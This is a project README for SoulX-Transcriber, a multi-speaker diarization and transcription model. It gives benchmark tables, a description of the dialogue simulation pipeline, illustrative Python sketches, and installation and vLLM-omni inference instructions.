SoulX-Transcriber: A Robust End-to-End Framework for Multi-Speaker Speech Transcription

Yuhang Dai¹,²*, Haopeng Lin²*, Zhennan Lin¹, Jiale Qian², Jun Wu², Hao Meng², Hanke Xie¹,², Hanlin Wen², Chuang Ding³, Shunshun Yin², Ming Tao², Lei Xie¹, Xinsheng Wang²†

*Equal contribution. †Corresponding author.

¹Audio, Speech and Language Processing Group (ASLP@NPU), Northwestern Polytechnical University, Xi’an, China
²Soul AI Lab, China
³Moonstep AI, China

🎬 Demo Video

soulx-transcriber-demo-01.mp4

Please visit our ✨demo page✨ for more demos.

🏆 SoulX-Transcriber Performance Overview

📖 Introduction

SoulX-Transcriber is a unified end-to-end large audio language model for speaker diarization and speech recognition in multi-speaker dialogue. Rather than relying on a cascaded pipeline, the model learns speaker attribution, timestamped segmentation, and transcription jointly in a single framework, producing coherent, speaker-consistent transcripts for overlapping and fast-turn conversations.

🌟 Highlights

State-of-the-art performance. SoulX-Transcriber uses a unified diarization and recognition framework that directly produces structured outputs consisting of timestamps, speaker labels, and transcripts. In the utterance-level evaluation it achieves the lowest DER among the compared models on both AISHELL-4 (2.89) and AliMeeting (5.39).
Speaker-aware multi-stage training. Speaker-aware multi-task continued pre-training followed by supervised fine-tuning strengthens speaker representation and robustness in conversations, mitigating same-gender confusion, overlap errors, and boundary errors.
A more natural and authentic approach to dialogue generation. We propose a speaker-characteristics-driven audio matching pipeline that automatically selects the most suitable reference audio for each utterance, producing more natural, context-aligned simulated dialogues.

📊 Results

Utterance-level Evaluation on open-source datasets

Model	AISHELL-4				AliMeeting				AMI-SDM
Model	DER↓	WER↓	cpWER↓	∆cp↓	DER↓	WER↓	cpWER↓	∆cp↓	DER↓	WER↓	cpWER↓	∆cp↓
VibeVoice-ASR	6.77	21.40	24.99	3.59	10.92	27.40	29.33	1.93	13.43	24.65	28.82	4.17
Gemini-2.5-Pro†	36.07	19.81	25.11	5.30	56.39	30.16	39.29	9.13	50.28	31.66	39.98	8.32
Gemini-3.1-pro-preview†	24.84	24.86	24.81	-0.05	30.76	18.82	18.99	0.17	40.40	30.82	32.97	2.15
Qwen3.5-omni†	22.33	15.13	14.71	-0.42	26.46	12.44	12.79	0.35	30.05	28.57	33.46	4.89
SoulX-Transcriber	2.89	14.16	13.90	-0.26	5.39	13.07	13.61	0.54	11.67	25.55	32.78	7.23
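
The table does not define ∆cp, but every row above is consistent with ∆cp = cpWER − WER, that is, the extra error that appears once words must also be attributed to the right speaker. The following is a minimal Python sketch that checks this reading against a few rows copied from the table. The helper names `delta_cp` and `check_rows` are introduced here for illustration only and are not part of the released code.

```python
# Rows copied from the utterance-level table:
# (model, dataset, WER, cpWER, reported delta-cp)
ROWS = [
    ("VibeVoice-ASR", "AISHELL-4", 21.40, 24.99, 3.59),
    ("SoulX-Transcriber", "AISHELL-4", 14.16, 13.90, -0.26),
    ("SoulX-Transcriber", "AliMeeting", 13.07, 13.61, 0.54),
    ("SoulX-Transcriber", "AMI-SDM", 25.55, 32.78, 7.23),
]


def delta_cp(wer: float, cpwer: float) -> float:
    """Assumed definition: cpWER minus WER, rounded to two decimals."""
    return round(cpwer - wer, 2)


def check_rows(rows):
    """Return the rows whose reported delta disagrees with cpWER - WER."""
    return [r for r in rows if abs(delta_cp(r[2], r[3]) - r[4]) > 1e-9]
```

Under this reading, a small or negative ∆cp means that speaker attribution adds almost no error on top of plain recognition, while a large ∆cp points to speaker confusion rather than misrecognized words.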

Segmented Evaluation (5-minute segments)

Model	AliMeeting				AISHELL-4
Model	DER↓	CER↓	cpCER↓	∆cp↓	DER↓	CER↓	cpCER↓	∆cp↓
End-to-End Baselines
VibeVoice-ASR	18.00	29.72	31.94	2.22	9.17	19.54	22.95	3.41
Gemini-2.5-Pro†	58.14	31.69	42.22	10.53	40.87	20.26	26.31	6.05
Gemini-3.1-pro-preview†	38.75	26.75	32.84	6.09	22.03	22.75	27.43	4.68
Qwen3-omni-30B-Instruct	38.36	25.28	37.54	12.26	34.71	15.95	23.63	7.68
Ours
SoulX-Transcriber	4.40	10.34	11.58	1.24	6.12	12.87	15.45	2.58

Internal Multi-domain Evaluation

Model	Social conversation				Drama				Podcast
Model	DER↓	WER↓	cpWER↓	∆cp↓	DER↓	WER↓	cpWER↓	∆cp↓	DER↓	WER↓	cpWER↓	∆cp↓
VibeVoice-ASR	2.76	30.34	31.77	1.43	27.78	21.86	45.87	24.01	14.7	8.88	14.58	5.7
Gemini-3.1-pro-preview†	38.69	29.14	36.72	7.58	34.87	10.01	21.03	11.02	24.56	23.89	27.21	3.32
SoulX-Transcriber	1.32	6.73	7.31	0.58	23.56	5.17	20.58	15.41	21.15	7.5	19.37	11.87

† Closed-source model.
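
The tables report cpWER (concatenated minimum-permutation word error rate) without spelling out how it is computed. As a rough illustration of the commonly used definition, the sketch below concatenates each speaker's utterances, tries every mapping between hypothesis and reference speakers, and keeps the mapping with the fewest word errors. It is not the evaluation code behind the numbers above: the function names are hypothetical, text normalization is omitted, and the brute-force search over permutations is only practical for a handful of speakers.

```python
from itertools import permutations


def edit_distance(ref, hyp):
    """Word-level Levenshtein distance between two token lists."""
    prev = list(range(len(hyp) + 1))
    for i, r in enumerate(ref, start=1):
        curr = [i]
        for j, h in enumerate(hyp, start=1):
            curr.append(min(
                prev[j] + 1,               # deletion
                curr[j - 1] + 1,           # insertion
                prev[j - 1] + (r != h),    # substitution or match
            ))
        prev = curr
    return prev[-1]


def cpwer(ref_by_speaker, hyp_by_speaker):
    """Both arguments map a speaker label to a list of utterance strings."""
    refs = [" ".join(utts).split() for utts in ref_by_speaker.values()]
    hyps = [" ".join(utts).split() for utts in hyp_by_speaker.values()]
    # Pad the shorter side with empty speakers so every speaker gets a partner.
    n = max(len(refs), len(hyps))
    refs += [[]] * (n - len(refs))
    hyps += [[]] * (n - len(hyps))
    total_ref_words = sum(len(r) for r in refs)
    if total_ref_words == 0:
        raise ValueError("reference transcript is empty")
    # Minimum total errors over all speaker permutations.
    best = min(
        sum(edit_distance(r, h) for r, h in zip(refs, perm))
        for perm in permutations(hyps)
    )
    return best / total_ref_words
```

Splitting each transcript into characters instead of whitespace-separated words gives the character-level variant (cpCER) used in the segmented evaluation.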

🧪 Multi-speaker Dialogue Simulation Pipeline

To improve out-of-domain generalization, we build an agent-based multi-speaker dialogue simulation pipeline with a speaker-aware prompt audio matching mechanism. Given a target dialogue text, the system analyzes speaker tags, selects the most suitable reference audio for each speaker using multi-dimensional speaker representations, and synthesizes context-consistent multi-turn dialogue audio.

Workflow: building the dialogue text database → building the reference audio database → target text analysis → reference audio matching → dialogue audio generation. Details are shown in the figure below.

Dialogue text database. We collect multi-speaker dialogue texts from Chinese and English podcasts and novels. An LLM annotates speaker tags and controls the number of speakers; we keep segments with 3–8 speakers to ensure natural, coherent dialogue context.
Dialogue context analysis. We use Qwen3-8B as the LLM for speaker-tag and context analysis, and SoulX-Podcast and MOSS-TTSD for long-form, multi-speaker, multi-turn TTS synthesis.
Reference audio database. We run VAD on long-form drama audio, cut it into 3–10 s clips, and filter the clips by UTMOS and SNR to ensure quality. Each clip is annotated by Gemini-3.1-pro-preview with multi-dimensional speaker attributes (e.g., gender, age, emotion, speech rate, pitch, timbre, style, tone, and role state). We embed each attribute with bge-m3 and stack the embeddings into a per-clip feature matrix, forming an embedding index for retrieval.
Best reference audio matching. Given a target dialogue with speaker tags, an LLM analyzes each speaker's attributes and builds the same multi-dimensional embedding representation. We compute the similarity against all reference clips, apply a weighted score across attribute dimensions, and retrieve the top-k (k=3) candidates per speaker. A final selection step enforces diversity (different source speakers) and UTMOS consistency (|Δ| ≤ 0.5) to produce the best reference audio set for synthesis.
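
The matching step described above can be sketched roughly as follows. This is an illustrative reconstruction, not the released implementation: the data layout, the attribute weights, the toy two-dimensional vectors standing in for bge-m3 embeddings, and the reading of UTMOS consistency as "the selected clips differ by at most 0.5" are all assumptions made for this example.

```python
from itertools import product
from math import sqrt


def cosine(a, b):
    """Cosine similarity of two equal-length vectors (0.0 if either is zero)."""
    dot = sum(x * y for x, y in zip(a, b))
    norm = sqrt(sum(x * x for x in a)) * sqrt(sum(y * y for y in b))
    return dot / norm if norm else 0.0


def weighted_score(target, clip, weights):
    """Weighted sum of per-attribute cosine similarities."""
    return sum(w * cosine(target[attr], clip["emb"][attr])
               for attr, w in weights.items())


def top_k(target, clips, weights, k=3):
    """Return the k best (score, clip) pairs for one target speaker."""
    scored = [(weighted_score(target, c, weights), c) for c in clips]
    return sorted(scored, key=lambda sc: sc[0], reverse=True)[:k]


def select_references(targets, clips, weights, k=3, max_utmos_gap=0.5):
    """Pick one clip per speaker tag; return {tag: clip id}, or None if impossible."""
    tags = list(targets)
    if not tags:
        return {}
    candidates = [top_k(targets[t], clips, weights, k) for t in tags]
    best, best_total = None, float("-inf")
    for combo in product(*candidates):
        chosen = [clip for _, clip in combo]
        # Diversity: every selected clip must come from a different source speaker.
        if len({c["source"] for c in chosen}) < len(chosen):
            continue
        # UTMOS consistency (assumed reading): quality spread within the set.
        utmos = [c["utmos"] for c in chosen]
        if max(utmos) - min(utmos) > max_utmos_gap:
            continue
        total = sum(score for score, _ in combo)
        if total > best_total:
            best, best_total = chosen, total
    return None if best is None else {t: c["id"] for t, c in zip(tags, best)}


# Toy data: two attributes, 2-d vectors in place of real embeddings.
WEIGHTS = {"gender": 0.6, "emotion": 0.4}
CLIPS = [
    {"id": "c1", "source": "drama_A", "utmos": 4.0, "emb": {"gender": [1, 0], "emotion": [1, 0]}},
    {"id": "c2", "source": "drama_A", "utmos": 4.1, "emb": {"gender": [0, 1], "emotion": [1, 0]}},
    {"id": "c3", "source": "drama_B", "utmos": 3.9, "emb": {"gender": [0, 1], "emotion": [0, 1]}},
    {"id": "c4", "source": "drama_C", "utmos": 3.0, "emb": {"gender": [1, 0], "emotion": [0, 1]}},
]
TARGETS = {
    "S1": {"gender": [1, 0], "emotion": [1, 0]},
    "S2": {"gender": [0, 1], "emotion": [1, 0]},
}
```

With this toy data, `select_references(TARGETS, CLIPS, WEIGHTS)` returns `{"S1": "c1", "S2": "c3"}`: the individually best pair (c1, c2) is rejected because both clips share a source speaker, and every combination that includes c4 is rejected by the UTMOS gap. Restricting the search to the top-k candidates keeps the exhaustive search small, at most 3^8 combinations for an 8-speaker dialogue.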

Installation

Environment Setup

git clone https://github.com/Soul-AILab/SoulX-Transcriber.git
cd SoulX-Transcriber

conda create -n soulx_transcriber python=3.12 -y
conda activate soulx_transcriber

Install MS-Swift and dependencies:

pip install ms-swift

Model Download

We provide the pre-trained model weights on Hugging Face and ModelScope. You can download the model from either platform:

Model Version	Description	Language	Download
SoulX-Transcriber	Full version of SoulX-Transcriber	ZH/EN	🤗 Hugging Face
SoulX-Transcriber	Full version of SoulX-Transcriber	ZH/EN	ModelScope

Training & Fine-tuning

SoulX-Transcriber shares the same architecture as Qwen3-Omni-30B-A3B-Instruct. We recommend using the ms-swift toolkit for continued pre-training and fine-tuning of this model.

Inference

vLLM-omni

SoulX-Transcriber is built on top of Qwen3-Omni-30B-A3B-Instruct. We recommend using vllm-omni for inference.

cd your_env_path/
# Install uv
curl -LsSf https://astral.sh/uv/install.sh | sh
# Create a new uv environment (using the Aliyun PyPI mirror)
uv venv vllm_omni --python 3.12 --seed --index-url https://mirrors.aliyun.com/pypi/simple/
# Activate the uv environment
source vllm_omni/bin/activate
# Install vLLM
uv pip install vllm --torch-backend=auto --index-url https://mirrors.aliyun.com/pypi/simple/
# Install vllm-omni
uv pip install vllm-omni --index-url https://mirrors.aliyun.com/pypi/simple/
# Optional: install the Gradio demo dependencies
uv pip install 'vllm-omni[demo]' --index-url https://mirrors.aliyun.com/pypi/simple/
# If you hit an "Undefined symbol" error while using VLLM_USE_PRECOMPILED=1, use "pip install -e . -v" to build from source.
git clone https://github.com/vllm-project/vllm-omni.git
cd vllm-omni
uv pip install -e . --index-url https://mirrors.aliyun.com/pypi/simple/

For more details on compiling vLLM from source, refer to the vLLM official documentation.

Infer a single WAV file

# stage1: download pretrained model
# stage2: inference
source your_env_path/vllm_omni/bin/activate  # source the env
bash ./inference.sh

Infer a single WAV file with a retry mechanism

# stage1: download pretrained model
# stage2: inference
source your_env_path/vllm_omni/bin/activate  # source the env
bash ./inference_with_retry.sh
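
The contents of inference_with_retry.sh are not reproduced here, so the following is only a generic sketch of what a retry wrapper around an inference command might look like in Python. The function name `run_with_retry` and the `max_attempts` and `delay_s` defaults are hypothetical choices for this example, not values taken from the repository.

```python
import subprocess
import time


def run_with_retry(cmd, max_attempts=3, delay_s=5.0):
    """Run cmd until it exits with status 0 or the attempts are exhausted.

    Returns the number of attempts used; raises RuntimeError if all fail.
    """
    for attempt in range(1, max_attempts + 1):
        result = subprocess.run(cmd)
        if result.returncode == 0:
            return attempt
        # Wait before the next attempt, but not after the final failure.
        if attempt < max_attempts:
            time.sleep(delay_s)
    raise RuntimeError(f"{cmd!r} failed after {max_attempts} attempts")
```

From the repository root, a call such as `run_with_retry(["bash", "./inference.sh"])` would rerun the plain inference script on a non-zero exit status. A fixed delay is the simplest policy; exponential backoff may be preferable when failures come from a busy GPU or a server that is still starting.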

🙏 Acknowledgements

Special thanks to the following open-source projects:

Citation

If you find this work useful, please cite:

@misc{dai2026soulxtranscriber,
      title={SoulX-Transcriber: A Robust End-to-End Framework for Multi-Speaker Speech Transcription}, 
      author={Yuhang Dai and Haopeng Lin and Zhennan Lin and Jiale Qian and Jun Wu and Hanke Xie and Hao Meng and Hanlin Wen and Chuang Ding and Shunshun Yin and Ming Tao and Lei Xie and Xinsheng Wang},
      year={2026},
      eprint={2606.02400},
      archivePrefix={arXiv},
      primaryClass={eess.AS},
      url={https://arxiv.org/abs/2606.02400}, 
}

License

This project is released under the Apache 2.0 License. Researchers and developers are free to use the code and model weights of SoulX-Transcriber. See LICENSE for details.

Contact

Issues: Please open a GitHub Issue for bug reports or suggestions.
Email: yhdai@mail.nwpu.edu.cn, haopenglin@soulapp.cn, lxie@nwpu.edu.cn, wangxinsheng@soulapp.cn
